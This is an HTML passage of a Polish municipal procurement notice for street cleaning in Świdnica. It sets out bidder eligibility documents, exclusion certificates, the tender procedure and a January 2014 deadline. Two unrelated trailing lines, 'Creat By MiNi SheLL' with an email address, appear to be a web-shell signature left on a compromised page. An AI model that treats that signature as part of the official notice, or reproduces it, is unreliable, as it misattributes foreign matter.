<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykaże się wykonaniem lub wykonywaniem usług polegających na oczyszczaniu ulic i placów o wartości łącznej nie mniejszej niż  300 000 zł brutto,  w tym jedno zadanie na kwotę minimum 100 000 zł brutto.
Opis dla potwierdzenia tego warunku powinien być zawarty  w załączniku nr 2 do oferty Wykonawcy ( wzór załącznik C do SIWZ).;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Jeżeli Wykonawca będzie polegał na zdolności ekonomiczno-finansowej podmiotów trzecich do oferty winien dołączyć oświadczenie o solidarnej odpowiedzialności za realizację zadania Wykonawcy i tych podmiotów ( art. 369 k.c. ).;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>7.1.2.5 dokument potwierdzający prawo posiadania lub dysponowania bazą sprzętowo - warsztatową ( umowa kupna, umowa użyczenia, umowa najmu itp. ) zlokalizowaną na terenie Miasta Świdnica lub Gminy Świdnica ( załącznik nr 8 do oferty Wykonawcy ).

7.1.2.6 Wykaz części zamówienia, której wykonanie Wykonawca powierzy podwykonawcy o którym mowa w pkt. 21.3  - wzór stanowi  załącznik  H  do  SIWZ ( załącznik nr 9 do oferty Wykonawcy ).

- dowód wniesienia wadium ( załącznik nr 19 do oferty Wykonawcy ),
- pełnomocnictwo do podpisania oferty w przypadku , gdy ofertę podpisuje osoba ( osoby nie wskazane w dokumencie rejestrowym ) upoważniona do składania oświadczeń woli przez Wykonawcę  ( załącznik nr 20 do oferty Wykonawcy  ),
- pełnomocnictwo dla pełnomocnika składającego ofertę w ramach oferty wspólnej ( załącznik nr 21 do oferty  Wykonawcy ),
- informację o przynależności do grupy kapitałowej w przypadku gdy Wykonawca należy do grupy kapitałowej- załącznik J do SIWZ ( załącznik nr 22 do oferty Wykonawcy ),
-  kosztorys ofertowy -załącznik K do SIWZ ( załącznik nr 23 do oferty Wykonawcy ),
- zaparafowany projekt umowy - załącznik L do SIWZ ( załącznik nr 24 do oferty Wykonawcy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy wprowadzane aneksem zaakceptowanym przez obie strony w następujących przypadkach:
a)  jeżeli zmiana umowy jest korzystna dla Zamawiającego ( korzyść ekonomiczna, techniczna, eksploatacyjna),
b) jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,
c) z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego
bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:// www.swidnica.bip-gov.info.pl/bip/glowna<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2014 godzina 09:00, miejsce: Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com